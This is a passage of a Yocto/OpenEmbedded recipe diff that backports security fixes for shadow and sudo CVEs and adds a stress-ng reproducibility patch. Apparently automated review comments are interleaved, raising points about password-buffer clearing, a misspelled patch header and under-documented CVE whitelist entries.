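+ cp = getpass (_("Re-enter new password: "));
+ if (NULL == cp) {
++ memzero (pass, sizeof pass);
+ exit (1);
+ }
+
+--
+2.42.0
+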
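Review bot: The commit message relies on memzero() calling explicit_bzero(3), but that describes the upstream tree at the time of the fix; how `memzero` is defined in the 4.8.1 sources this recipe builds is not visible here. If it is a plain memset() wrapper there, the added `memzero (pass, sizeof pass);` directly before `exit (1)` is a store the compiler may drop, and the first password would stay in the static buffer. Please confirm the definition and, if needed, backport the explicit_bzero-based one with it. The message also refers to agetpass() while the hunk context shows `getpass`, so a header line noting that the backport was adapted would help. change_passwd() continues outside the hunk.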
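--- a/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb
+++ b/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb
@@ -2,7 +2,7 @@ SUMMARY = "Shadow utils requirements for useradd.bbclass"
 HOMEPAGE = "http://github.com/shadow-maint/shadow"
 BUGTRACKER = "http://github.com/shadow-maint/shadow/issues"
 SECTION = "base utils"
-LICENSE = "BSD | Artistic-1.0"
+LICENSE = "BSD-3-Clause | Artistic-1.0"
 LIC_FILES_CHKSUM = "file://login.defs_shadow-sysroot;md5=25e2f2de4dfc8f966ac5cdfce45cd7d5"
 
 DEPENDS = "base-passwd"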
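--- a/meta/recipes-extended/shadow/shadow.inc
+++ b/meta/recipes-extended/shadow/shadow.inc
@@ -1,8 +1,9 @@
 SUMMARY = "Tools to change and administer password and group data"
 HOMEPAGE = "http://github.com/shadow-maint/shadow"
+DESCRIPTION = "${SUMMARY}"
 BUGTRACKER = "http://github.com/shadow-maint/shadow/issues"
 SECTION = "base/utils"
-LICENSE = "BSD | Artistic-1.0"
+LICENSE = "BSD-3-Clause | Artistic-1.0"
 LIC_FILES_CHKSUM = "file://COPYING;md5=ed80ff1c2b40843cf5768e5229cf16e5 \
  file://src/passwd.c;beginline=2;endline=30;md5=5720ff729a6ff39ecc9f64555d75f4af"
 
@@ -13,6 +14,9 @@ SRC_URI = "https://github.com/shadow-maint/shadow/releases/download/${PV}/${BP}.
  file://shadow-4.1.3-dots-in-usernames.patch \
  ${@bb.utils.contains('PACKAGECONFIG', 'pam', '${PAM_SRC_URI}', '', d)} \
  file://shadow-relaxed-usernames.patch \
+ file://CVE-2023-29383.patch \
+ file://0001-Overhaul-valid_field.patch \
+ file://CVE-2023-4641.patch \
  "
 
 SRC_URI_append_class-target = " \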
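--- a/meta/recipes-extended/shadow/shadow_4.8.1.bb
+++ b/meta/recipes-extended/shadow/shadow_4.8.1.bb
@@ -6,5 +6,10 @@ BUILD_LDFLAGS_append_class-target = " ${@bb.utils.contains('DISTRO_FEATURES', 'p
 
 BBCLASSEXTEND = "native nativesdk"
 
+# Severity is low and marked as closed and won't fix.
+# https://bugzilla.redhat.com/show_bug.cgi?id=884658
+CVE_CHECK_WHITELIST += "CVE-2013-4235"
 
+# This is an issue for a different shadow
+CVE_CHECK_WHITELIST += "CVE-2016-15024"
 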
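Review bot: The comment on the second whitelist entry, `# This is an issue for a different shadow`, does not say which product CVE-2016-15024 belongs to or where that was checked, unlike the CVE-2013-4235 entry above it, which links the bug report. A whitelist entry removes the CVE from cve-check output, so its justification should be checkable later. I would name the affected product and add the reference in the comment, in the form `# CVE-2016-15024 applies to <PRODUCT>, not shadow-maint/shadow: <REFERENCE-URL>`.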
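--- /dev/null
+++ b/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch
@@ -0,0 +1,26 @@
+From 2386cd8f907b379ae5cc1ce2888abef7d30e709a Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex@linutronix.de>
+Date: Sat, 23 Oct 2021 20:20:59 +0200
+Subject: [PATCH] Makefile: do not write the timestamp into compressed manpage.
+
+This helps reproducibility.
+
+Upstream-Status: Submitted [https://github.com/ColinIanKing/stress-ng/pull/156]
+Signed-off-by: Alexander Kanavin <alex@linutronix.de>
+---
+ Makefile | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Makefile b/Makefile
+index 886018f9..f4290f9c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -412,7 +412,7 @@ git-commit-id.h:
+ $(OBJS): stress-ng.h Makefile
+
+ stress-ng.1.gz: stress-ng.1
+- gzip -c $< > $@
++ gzip -n -c $< > $@
+
+ .PHONY: dist
+ dist: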
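--- a/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb
+++ b/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb
@@ -5,11 +5,12 @@ HOMEPAGE = "https://kernel.ubuntu.com/~cking/stress-ng/"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
 
-SRC_URI = "https://kernel.ubuntu.com/~cking/tarballs/${BPN}/${BP}.tar.xz \
+SRC_URI = "git://github.com/ColinIanKing/stress-ng.git;protocol=https;branch=master \
  file://0001-Do-not-preserve-ownership-when-installing-example-jo.patch \
+ file://0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch \
  "
-SRC_URI[md5sum] = "7b89157c838f2bb4bdeba8f46e3c56ae"
-SRC_URI[sha256sum] = "860291dd3a18b985b3483190a627bbede2b5c52113766c1921001b3fb4b83af0"
+SRCREV = "e045bcd711178c11b7e797ef6b4c524658468596"
+S = "${WORKDIR}/git"
 
 DEPENDS = "coreutils-native"
 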
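Review bot: Nothing in the recipe records which upstream release the new `SRCREV` corresponds to, now that the release tarball and its `SRC_URI[sha256sum]` are removed. The full commit id keeps the fetch pinned, but a reader cannot tell from the recipe that the revision matches ${PV}. I would add a comment above it such as `# SRCREV is the commit tagged for ${PV} upstream`, after checking it against the upstream tag.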
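--- /dev/null
+++ b/meta/recipes-extended/sudo/files/CVE-2023-22809.patch
@@ -0,0 +1,113 @@
+Backport of:
+
+# HG changeset patch
+# Parent 7275148cad1f8cd3c350026460acc4d6ad349c3a
+sudoedit: do not permit editor arguments to include "--"
+We use "--" to separate the editor and arguments from the files to edit.
+If the editor arguments include "--", sudo can be tricked into allowing
+the user to edit a file not permitted by the security policy.
+Thanks to Matthieu Barjole and Victor Cutillas of Synacktiv
+(https://synacktiv.com) for finding this bug.
+
+CVE: CVE-2023-22809
+Upstream-Staus: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.8.31-1ubuntu1.4.debian.tar.xz]
+Signed-off-by: Omkar Patil <omkar.patil@kpit.com>
+
+--- a/plugins/sudoers/editor.c
++++ b/plugins/sudoers/editor.c
+@@ -56,7 +56,7 @@ resolve_editor(const char *ed, size_t ed
+ const char *cp, *ep, *tmp;
+ const char *edend = ed + edlen;
+ struct stat user_editor_sb;
+- int nargc;
++ int nargc = 0;
+ debug_decl(resolve_editor, SUDOERS_DEBUG_UTIL)
+
+ /*
+@@ -102,6 +102,21 @@ resolve_editor(const char *ed, size_t ed
+ free(editor_path);
+ while (nargc--)
+ free(nargv[nargc]);
++ free(nargv);
++ debug_return_str(NULL);
++ }
++
++ /*
++ * We use "--" to separate the editor and arguments from the files
++ * to edit. The editor arguments themselves may not contain "--".
++ */
++ if (strcmp(nargv[nargc], "--") == 0) {
++ sudo_warnx(U_("ignoring editor: %.*s"), (int)edlen, ed);
++ sudo_warnx("%s", U_("editor arguments may not contain \"--\""));
++ errno = EINVAL;
++ free(editor_path);
++ while (nargc--)
++ free(nargv[nargc]);
+ free(nargv);
+ debug_return_str(NULL);
+ }
+--- a/plugins/sudoers/sudoers.c
++++ b/plugins/sudoers/sudoers.c
+@@ -616,20 +616,31 @@ sudoers_policy_main(int argc, char * con
+
+ /* Note: must call audit before uid change. */
+ if (ISSET(sudo_mode, MODE_EDIT)) {
++ const char *env_editor = NULL;
+ int edit_argc;
+- const char *env_editor;
+
+ free(safe_cmnd);
+ safe_cmnd = find_editor(NewArgc - 1, NewArgv + 1, &edit_argc,
+ &edit_argv, NULL, &env_editor, false);
+ if (safe_cmnd == NULL) {
+- if (errno != ENOENT)
++ switch (errno) {
++ case ENOENT:
++ audit_failure(NewArgc, NewArgv, N_("%s: command not found"),
++ env_editor ? env_editor : def_editor);
++ sudo_warnx(U_("%s: command not found"),
++ env_editor ? env_editor : def_editor);
++ goto bad;
++ case EINVAL:
++ if (def_env_editor && env_editor != NULL) {
++ /* User tried to do something funny with the editor. */
++ log_warningx(SLOG_NO_STDERR|SLOG_SEND_MAIL,
++ "invalid user-specified editor: %s", env_editor);
++ goto bad;
++ }
++ /* FALLTHROUGH */
++ default:
+ goto done;
+- audit_failure(NewArgc, NewArgv, N_("%s: command not found"),
+- env_editor ? env_editor : def_editor);
+- sudo_warnx(U_("%s: command not found"),
+- env_editor ? env_editor : def_editor);
+- goto bad;
++ }
+ }
+ if (audit_success(edit_argc, edit_argv) != 0 && !def_ignore_audit_errors)
+ goto done;
+--- a/plugins/sudoers/visudo.c
++++ b/plugins/sudoers/visudo.c
+@@ -308,7 +308,7 @@ static char *
+ get_editor(int *editor_argc, char ***editor_argv)
+ {
+ char *editor_path = NULL, **whitelist = NULL;
+- const char *env_editor;
++ const char *env_editor = NULL;
+ static char *files[] = { "+1", "sudoers" };
+ unsigned int whitelist_len = 0;
+ debug_decl(get_editor, SUDOERS_DEBUG_UTIL)
+@@ -342,7 +342,11 @@ get_editor(int *editor_argc, char ***edi
+ if (editor_path == NULL) {
+ if (def_env_editor && env_editor != NULL) {
+ /* We are honoring $EDITOR so this is a fatal error. */
+- sudo_fatalx(U_("specified editor (%s) doesn't exist"), env_editor);
++ if (errno == ENOENT) {
++ sudo_warnx(U_("specified editor (%s) doesn't exist"),
++ env_editor);
++ }
++ exit(EXIT_FAILURE);
+ }
+ sudo_fatalx(U_("no editor found (editor path = %s)"), def_editor);
+ }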
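Review bot: The header tag is misspelled as `Upstream-Staus:`, so tooling that looks for `Upstream-Status:` will not find a status for this security patch. The line should start with `Upstream-Status: Backport`, followed by the same bracketed URL. In the visudo.c hunk, the new branch reaches `exit(EXIT_FAILURE)` without printing anything when errno is not ENOENT. That is presumably intended because resolve_editor() already warns before setting EINVAL, but any other errno would exit silently. get_editor() begins and ends outside the hunk.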
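--- a/meta/recipes-extended/sudo/sudo.inc
+++ b/meta/recipes-extended/sudo/sudo.inc
@@ -3,7 +3,7 @@ DESCRIPTION = "Sudo (superuser do) allows a system administrator to give certain
 HOMEPAGE = "http://www.sudo.ws"
 BUGTRACKER = "http://www.sudo.ws/bugs/"
 SECTION = "admin"
-LICENSE = "ISC & BSD & Zlib"
+LICENSE = "ISC & BSD-3-Clause & BSD-2-Clause & Zlib"
 LIC_FILES_CHKSUM = "file://doc/LICENSE;md5=07966675feaddba70cc812895b248230 \
  file://plugins/sudoers/redblack.c;beginline=1;endline=46;md5=03e35317699ba00b496251e0dfe9f109 \
  file://lib/util/reallocarray.c;beginline=3;endline=15;md5=397dd45c7683e90b9f8bf24638cf03bf \
@@ -49,3 +49,5 @@ do_compile_prepend () {
 do_install_prepend (){
  mkdir -p ${D}/${localstatedir}/lib
 }
+
+CVE_VERSION_SUFFIX = "patch"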
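--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch
@@ -0,0 +1,59 @@
+From e1554d7996a59bf69544f3d8dd4ae683027948f9 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 15 Nov 2022 09:17:18 +0530
+Subject: [PATCH] CVE-2022-43995
+
+Upstream-Status: Backport [https://github.com/sudo-project/sudo/commit/bd209b9f16fcd1270c13db27ae3329c677d48050]
+CVE: CVE-2022-43995
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+Potential heap overflow for passwords < 8
+characters. Starting with sudo 1.8.0 the plaintext password buffer is
+dynamically sized so it is not safe to assume that it is at least 9 bytes in
+size.
+Found by Hugo Lefeuvre (University of Manchester) with ConfFuzz.
+---
+ plugins/sudoers/auth/passwd.c | 11 +++++------
+ 1 file changed, 5 insertions(+), 6 deletions(-)
+
+diff --git a/plugins/sudoers/auth/passwd.c b/plugins/sudoers/auth/passwd.c
+index 03c7a16..76a7824 100644
+--- a/plugins/sudoers/auth/passwd.c
++++ b/plugins/sudoers/auth/passwd.c
+@@ -63,7 +63,7 @@ sudo_passwd_init(struct passwd *pw, sudo_auth *auth)
+ int
+ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_conv_callback *callback)
+ {
+- char sav, *epass;
++ char des_pass[9], *epass;
+ char *pw_epasswd = auth->data;
+ size_t pw_len;
+ int matched = 0;
+@@ -75,12 +75,12 @@ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_c
+
+ /*
+ * Truncate to 8 chars if standard DES since not all crypt()'s do this.
+- * If this turns out not to be safe we will have to use OS #ifdef's (sigh).
+ */
+- sav = pass[8];
+ pw_len = strlen(pw_epasswd);
+- if (pw_len == DESLEN || HAS_AGEINFO(pw_epasswd, pw_len))
+- pass[8] = '\0';
++ if (pw_len == DESLEN || HAS_AGEINFO(pw_epasswd, pw_len)) {
++ strlcpy(des_pass, pass, sizeof(des_pass));
++ pass = des_pass;
++ }
+
+ /*
+ * Normal UN*X password check.
+@@ -88,7 +88,6 @@ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_c
+ * only compare the first DESLEN characters in that case.
+ */
+ epass = (char *) crypt(pass, pw_epasswd);
+- pass[8] = sav;
+ if (epass != NULL) {
+ if (HAS_AGEINFO(pw_epasswd, pw_len) && strlen(epass) == DESLEN)
+ matched = !strncmp(pw_epasswd, epass, DESLEN);
+--
+2.25.1
+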
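Review bot: `des_pass` receives up to eight characters of the plaintext password through `strlcpy(des_pass, pass, sizeof(des_pass));`, and nothing in the visible hunks clears it once `crypt()` has been called. The old code truncated `pass` in place and kept no second copy, so this fix for the overflow adds a new plaintext copy on the stack. I would add `explicit_bzero(des_pass, sizeof(des_pass));` after the comparison and before the function returns, provided this sudo version offers explicit_bzero or a compat equivalent. sudo_passwd_verify() continues past the last hunk, so the exact place has to be chosen there.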
diff --git a/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch
new file mode 100644
index 0000000000..bc6f8c19a6
--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch
@@ -0,0 +1,646 @@
1Origin: Backport obtained from SUSE. Thanks!
2
3From 334daf92b31b79ce68ed75e2ee14fca265f029ca Mon Sep 17 00:00:00 2001
4From: "Todd C. Miller" <Todd.Miller@sudo.ws>
5Date: Wed, 18 Jan 2023 08:21:34 -0700
6Subject: [PATCH] Escape control characters in log messages and "sudoreplay -l"
7 output. The log message contains user-controlled strings that could include
8 things like terminal control characters. Space characters in the command
9 path are now also escaped.
10
11Command line arguments that contain spaces are surrounded with
12single quotes and any literal single quote or backslash characters
13are escaped with a backslash. This makes it possible to distinguish
14multiple command line arguments from a single argument that contains
15spaces.
16
17Issue found by Matthieu Barjole and Victor Cutillas of Synacktiv
18(https://synacktiv.com).
19
20Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/sudo/tree/debian/patches/CVE-2023-2848x-1.patch?h=ubuntu/focal-security
21Upstream commit https://github.com/sudo-project/sudo/commit/334daf92b31b79ce68ed75e2ee14fca265f029ca]
22CVE: CVE-2023-28486 CVE-2023-28487
23Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
24---
25 doc/sudoers.man.in | 33 +++++++--
26 doc/sudoers.mdoc.in | 28 ++++++--
27 doc/sudoreplay.man.in | 9 ++
28 doc/sudoreplay.mdoc.in | 10 ++
29 include/sudo_compat.h | 6 +
30 include/sudo_lbuf.h | 7 ++
31 lib/util/lbuf.c | 106 +++++++++++++++++++++++++++++++
32 lib/util/util.exp.in | 1
33 plugins/sudoers/logging.c | 145 +++++++++++--------------------------------
34 plugins/sudoers/sudoreplay.c | 44 +++++++++----
35 10 files changed, 257 insertions(+), 132 deletions(-)
36
37--- a/doc/sudoers.man.in
38+++ b/doc/sudoers.man.in
39@@ -4566,6 +4566,19 @@ can log events using either
40 syslog(3)
41 or a simple log file.
42 The log format is almost identical in both cases.
43+Any control characters present in the log data are formatted in octal
44+with a leading
45+\(oq#\(cq
46+character.
47+For example, a horizontal tab is stored as
48+\(oq#011\(cq
49+and an embedded carriage return is stored as
50+\(oq#015\(cq.
51+In addition, space characters in the command path are stored as
52+\(oq#040\(cq.
53+Literal single quotes and backslash characters
54+(\(oq\e\(cq)
55+in command line arguments are escaped with a backslash.
56 .SS "Accepted command log entries"
57 Commands that sudo runs are logged using the following format (split
58 into multiple lines for readability):
59@@ -4646,7 +4659,7 @@ A list of environment variables specifie
60 if specified.
61 .TP 14n
62 command
63-The actual command that was executed.
64+The actual command that was executed, including any command line arguments.
65 .PP
66 Messages are logged using the locale specified by
67 \fIsudoers_locale\fR,
68@@ -4882,17 +4895,21 @@ with a few important differences:
69 1.\&
70 The
71 \fIprogname\fR
72-and
73-\fIhostname\fR
74-fields are not present.
75+field is not present.
76 .TP 5n
77 2.\&
78-If the
79-\fIlog_year\fR
80-option is enabled,
81-the date will also include the year.
82+The
83+\fIhostname\fR
84+is only logged if the
85+\fIlog_host\fR
86+option is enabled.
87 .TP 5n
88 3.\&
89+The date does not include the year unless the
90+\fIlog_year\fR
91+option is enabled.
92+.TP 5n
93+4.\&
94 Lines that are longer than
95 \fIloglinelen\fR
96 characters (80 by default) are word-wrapped and continued on the
97--- a/doc/sudoers.mdoc.in
98+++ b/doc/sudoers.mdoc.in
99@@ -4261,6 +4261,19 @@ can log events using either
100 .Xr syslog 3
101 or a simple log file.
102 The log format is almost identical in both cases.
103+Any control characters present in the log data are formatted in octal
104+with a leading
105+.Ql #
106+character.
107+For example, a horizontal tab is stored as
108+.Ql #011
109+and an embedded carriage return is stored as
110+.Ql #015 .
111+In addition, space characters in the command path are stored as
112+.Ql #040 .
113+Literal single quotes and backslash characters
114+.Pq Ql \e
115+in command line arguments are escaped with a backslash.
116 .Ss Accepted command log entries
117 Commands that sudo runs are logged using the following format (split
118 into multiple lines for readability):
119@@ -4328,7 +4341,7 @@ option is enabled.
120 A list of environment variables specified on the command line,
121 if specified.
122 .It command
123-The actual command that was executed.
124+The actual command that was executed, including any command line arguments.
125 .El
126 .Pp
127 Messages are logged using the locale specified by
128@@ -4550,14 +4563,17 @@ with a few important differences:
129 .It
130 The
131 .Em progname
132-and
133+field is not present.
134+.It
135+The
136 .Em hostname
137-fields are not present.
138+is only logged if the
139+.Em log_host
140+option is enabled.
141 .It
142-If the
143+The date does not include the year unless the
144 .Em log_year
145-option is enabled,
146-the date will also include the year.
147+option is enabled.
148 .It
149 Lines that are longer than
150 .Em loglinelen
151--- a/doc/sudoreplay.man.in
152+++ b/doc/sudoreplay.man.in
153@@ -149,6 +149,15 @@ In this mode,
154 will list available sessions in a format similar to the
155 \fBsudo\fR
156 log file format, sorted by file name (or sequence number).
157+Any control characters present in the log data are formated in octal
158+with a leading
159+\(oq#\(cq
160+character.
161+For example, a horizontal tab is displayed as
162+\(oq#011\(cq
163+and an embedded carriage return is displayed as
164+\(oq#015\(cq.
165+.sp
166 If a
167 \fIsearch expression\fR
168 is specified, it will be used to restrict the IDs that are displayed.
169--- a/doc/sudoreplay.mdoc.in
170+++ b/doc/sudoreplay.mdoc.in
171@@ -142,6 +142,16 @@ In this mode,
172 will list available sessions in a format similar to the
173 .Nm sudo
174 log file format, sorted by file name (or sequence number).
175+Any control characters present in the log data are formatted in octal
176+with a leading
177+.Ql #
178+character.
179+For example, a horizontal tab is displayed as
180+.Ql #011
181+and an embedded carriage return is displayed as
182+.Ql #015 .
183+Space characters in the command name and arguments are also formatted in octal.
184+.Pp
185 If a
186 .Ar search expression
187 is specified, it will be used to restrict the IDs that are displayed.
188--- a/include/sudo_compat.h
189+++ b/include/sudo_compat.h
190@@ -79,6 +79,12 @@
191 # endif
192 #endif
193
194+#ifdef HAVE_FALLTHROUGH_ATTRIBUTE
195+# define FALLTHROUGH __attribute__((__fallthrough__))
196+#else
197+# define FALLTHROUGH do { } while (0)
198+#endif
199+
200 /*
201 * Given the pointer x to the member m of the struct s, return
202 * a pointer to the containing structure.
203--- a/include/sudo_lbuf.h
204+++ b/include/sudo_lbuf.h
205@@ -36,9 +36,15 @@ struct sudo_lbuf {
206
207 typedef int (*sudo_lbuf_output_t)(const char *);
208
209+/* Flags for sudo_lbuf_append_esc() */
210+#define LBUF_ESC_CNTRL 0x01
211+#define LBUF_ESC_BLANK 0x02
212+#define LBUF_ESC_QUOTE 0x04
213+
214 __dso_public void sudo_lbuf_init_v1(struct sudo_lbuf *lbuf, sudo_lbuf_output_t output, int indent, const char *continuation, int cols);
215 __dso_public void sudo_lbuf_destroy_v1(struct sudo_lbuf *lbuf);
216 __dso_public bool sudo_lbuf_append_v1(struct sudo_lbuf *lbuf, const char *fmt, ...) __printflike(2, 3);
217+__dso_public bool sudo_lbuf_append_esc_v1(struct sudo_lbuf *lbuf, int flags, const char *fmt, ...) __printflike(3, 4);
218 __dso_public bool sudo_lbuf_append_quoted_v1(struct sudo_lbuf *lbuf, const char *set, const char *fmt, ...) __printflike(3, 4);
219 __dso_public void sudo_lbuf_print_v1(struct sudo_lbuf *lbuf);
220 __dso_public bool sudo_lbuf_error_v1(struct sudo_lbuf *lbuf);
221@@ -47,6 +53,7 @@ __dso_public void sudo_lbuf_clearerr_v1(
222 #define sudo_lbuf_init(_a, _b, _c, _d, _e) sudo_lbuf_init_v1((_a), (_b), (_c), (_d), (_e))
223 #define sudo_lbuf_destroy(_a) sudo_lbuf_destroy_v1((_a))
224 #define sudo_lbuf_append sudo_lbuf_append_v1
225+#define sudo_lbuf_append_esc sudo_lbuf_append_esc_v1
226 #define sudo_lbuf_append_quoted sudo_lbuf_append_quoted_v1
227 #define sudo_lbuf_print(_a) sudo_lbuf_print_v1((_a))
228 #define sudo_lbuf_error(_a) sudo_lbuf_error_v1((_a))
229--- a/lib/util/lbuf.c
230+++ b/lib/util/lbuf.c
231@@ -93,6 +93,112 @@ sudo_lbuf_expand(struct sudo_lbuf *lbuf,
232 }
233
234 /*
235+ * Escape a character in octal form (#0n) and store it as a string
236+ * in buf, which must have at least 6 bytes available.
237+ * Returns the length of buf, not counting the terminating NUL byte.
238+ */
239+static int
240+escape(unsigned char ch, char *buf)
241+{
242+ const int len = ch < 0100 ? (ch < 010 ? 3 : 4) : 5;
243+
244+ /* Work backwards from the least significant digit to most significant. */
245+ switch (len) {
246+ case 5:
247+ buf[4] = (ch & 7) + '0';
248+ ch >>= 3;
249+ FALLTHROUGH;
250+ case 4:
251+ buf[3] = (ch & 7) + '0';
252+ ch >>= 3;
253+ FALLTHROUGH;
254+ case 3:
255+ buf[2] = (ch & 7) + '0';
256+ buf[1] = '0';
257+ buf[0] = '#';
258+ break;
259+ }
260+ buf[len] = '\0';
261+
262+ return len;
263+}
264+
265+/*
266+ * Parse the format and append strings, only %s and %% escapes are supported.
267+ * Any non-printable characters are escaped in octal as #0nn.
268+ */
269+bool
270+sudo_lbuf_append_esc_v1(struct sudo_lbuf *lbuf, int flags, const char *fmt, ...)
271+{
272+ unsigned int saved_len = lbuf->len;
273+ bool ret = false;
274+ const char *s;
275+ va_list ap;
276+ debug_decl(sudo_lbuf_append_esc, SUDO_DEBUG_UTIL);
277+
278+ if (sudo_lbuf_error(lbuf))
279+ debug_return_bool(false);
280+
281+#define should_escape(ch) \
282+ ((ISSET(flags, LBUF_ESC_CNTRL) && iscntrl((unsigned char)ch)) || \
283+ (ISSET(flags, LBUF_ESC_BLANK) && isblank((unsigned char)ch)))
284+#define should_quote(ch) \
285+ (ISSET(flags, LBUF_ESC_QUOTE) && (ch == '\'' || ch == '\\'))
286+
287+ va_start(ap, fmt);
288+ while (*fmt != '\0') {
289+ if (fmt[0] == '%' && fmt[1] == 's') {
290+ if ((s = va_arg(ap, char *)) == NULL)
291+ s = "(NULL)";
292+ while (*s != '\0') {
293+ if (should_escape(*s)) {
294+ if (!sudo_lbuf_expand(lbuf, sizeof("#0177") - 1))
295+ goto done;
296+ lbuf->len += escape(*s++, lbuf->buf + lbuf->len);
297+ continue;
298+ }
299+ if (should_quote(*s)) {
300+ if (!sudo_lbuf_expand(lbuf, 2))
301+ goto done;
302+ lbuf->buf[lbuf->len++] = '\\';
303+ lbuf->buf[lbuf->len++] = *s++;
304+ continue;
305+ }
306+ if (!sudo_lbuf_expand(lbuf, 1))
307+ goto done;
308+ lbuf->buf[lbuf->len++] = *s++;
309+ }
310+ fmt += 2;
311+ continue;
312+ }
313+ if (should_escape(*fmt)) {
314+ if (!sudo_lbuf_expand(lbuf, sizeof("#0177") - 1))
315+ goto done;
316+ if (*fmt == '\'') {
317+ lbuf->buf[lbuf->len++] = '\\';
318+ lbuf->buf[lbuf->len++] = *fmt++;
319+ } else {
320+ lbuf->len += escape(*fmt++, lbuf->buf + lbuf->len);
321+ }
322+ continue;
323+ }
324+ if (!sudo_lbuf_expand(lbuf, 1))
325+ goto done;
326+ lbuf->buf[lbuf->len++] = *fmt++;
327+ }
328+ ret = true;
329+
330+done:
331+ if (!ret)
332+ lbuf->len = saved_len;
333+ if (lbuf->size != 0)
334+ lbuf->buf[lbuf->len] = '\0';
335+ va_end(ap);
336+
337+ debug_return_bool(ret);
338+}
339+
340+/*
341 * Parse the format and append strings, only %s and %% escapes are supported.
342 * Any characters in set are quoted with a backslash.
343 */
344--- a/lib/util/util.exp.in
345+++ b/lib/util/util.exp.in
346@@ -79,6 +79,7 @@ sudo_gethostname_v1
347 sudo_gettime_awake_v1
348 sudo_gettime_mono_v1
349 sudo_gettime_real_v1
350+sudo_lbuf_append_esc_v1
351 sudo_lbuf_append_quoted_v1
352 sudo_lbuf_append_v1
353 sudo_lbuf_clearerr_v1
354--- a/plugins/sudoers/logging.c
355+++ b/plugins/sudoers/logging.c
356@@ -58,6 +58,7 @@
357 #include <syslog.h>
358
359 #include "sudoers.h"
360+#include "sudo_lbuf.h"
361
362 #ifndef HAVE_GETADDRINFO
363 # include "compat/getaddrinfo.h"
364@@ -940,14 +941,6 @@ should_mail(int status)
365 (def_mail_no_perms && !ISSET(status, VALIDATE_SUCCESS)));
366 }
367
368-#define LL_TTY_STR "TTY="
369-#define LL_CWD_STR "PWD=" /* XXX - should be CWD= */
370-#define LL_USER_STR "USER="
371-#define LL_GROUP_STR "GROUP="
372-#define LL_ENV_STR "ENV="
373-#define LL_CMND_STR "COMMAND="
374-#define LL_TSID_STR "TSID="
375-
376 #define IS_SESSID(s) ( \
377 isalnum((unsigned char)(s)[0]) && isalnum((unsigned char)(s)[1]) && \
378 (s)[2] == '/' && \
379@@ -962,14 +955,16 @@ should_mail(int status)
380 static char *
381 new_logline(const char *message, const char *errstr)
382 {
383- char *line = NULL, *evstr = NULL;
384 #ifndef SUDOERS_NO_SEQ
385 char sessid[7];
386 #endif
387 const char *tsid = NULL;
388- size_t len = 0;
389+ struct sudo_lbuf lbuf;
390+ int i;
391 debug_decl(new_logline, SUDOERS_DEBUG_LOGGING)
392
393+ sudo_lbuf_init(&lbuf, NULL, 0, NULL, 0);
394+
395 #ifndef SUDOERS_NO_SEQ
396 /* A TSID may be a sudoers-style session ID or a free-form string. */
397 if (sudo_user.iolog_file != NULL) {
398@@ -989,119 +984,55 @@ new_logline(const char *message, const c
399 #endif
400
401 /*
402- * Compute line length
403+ * Format the log line as an lbuf, escaping control characters in
404+ * octal form (#0nn). Error checking (ENOMEM) is done at the end.
405 */
406- if (message != NULL)
407- len += strlen(message) + 3;
408- if (errstr != NULL)
409- len += strlen(errstr) + 3;
410- len += sizeof(LL_TTY_STR) + 2 + strlen(user_tty);
411- len += sizeof(LL_CWD_STR) + 2 + strlen(user_cwd);
412- if (runas_pw != NULL)
413- len += sizeof(LL_USER_STR) + 2 + strlen(runas_pw->pw_name);
414- if (runas_gr != NULL)
415- len += sizeof(LL_GROUP_STR) + 2 + strlen(runas_gr->gr_name);
416- if (tsid != NULL)
417- len += sizeof(LL_TSID_STR) + 2 + strlen(tsid);
418- if (sudo_user.env_vars != NULL) {
419- size_t evlen = 0;
420- char * const *ep;
421-
422- for (ep = sudo_user.env_vars; *ep != NULL; ep++)
423- evlen += strlen(*ep) + 1;
424- if (evlen != 0) {
425- if ((evstr = malloc(evlen)) == NULL)
426- goto oom;
427- evstr[0] = '\0';
428- for (ep = sudo_user.env_vars; *ep != NULL; ep++) {
429- strlcat(evstr, *ep, evlen);
430- strlcat(evstr, " ", evlen); /* NOTE: last one will fail */
431- }
432- len += sizeof(LL_ENV_STR) + 2 + evlen;
433- }
434- }
435- if (user_cmnd != NULL) {
436- /* Note: we log "sudo -l command arg ..." as "list command arg ..." */
437- len += sizeof(LL_CMND_STR) - 1 + strlen(user_cmnd);
438- if (ISSET(sudo_mode, MODE_CHECK))
439- len += sizeof("list ") - 1;
440- if (user_args != NULL)
441- len += strlen(user_args) + 1;
442- }
443-
444- /*
445- * Allocate and build up the line.
446- */
447- if ((line = malloc(++len)) == NULL)
448- goto oom;
449- line[0] = '\0';
450
451 if (message != NULL) {
452- if (strlcat(line, message, len) >= len ||
453- strlcat(line, errstr ? " : " : " ; ", len) >= len)
454- goto toobig;
455+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "%s%s", message,
456+ errstr ? " : " : " ; ");
457 }
458 if (errstr != NULL) {
459- if (strlcat(line, errstr, len) >= len ||
460- strlcat(line, " ; ", len) >= len)
461- goto toobig;
462- }
463- if (strlcat(line, LL_TTY_STR, len) >= len ||
464- strlcat(line, user_tty, len) >= len ||
465- strlcat(line, " ; ", len) >= len)
466- goto toobig;
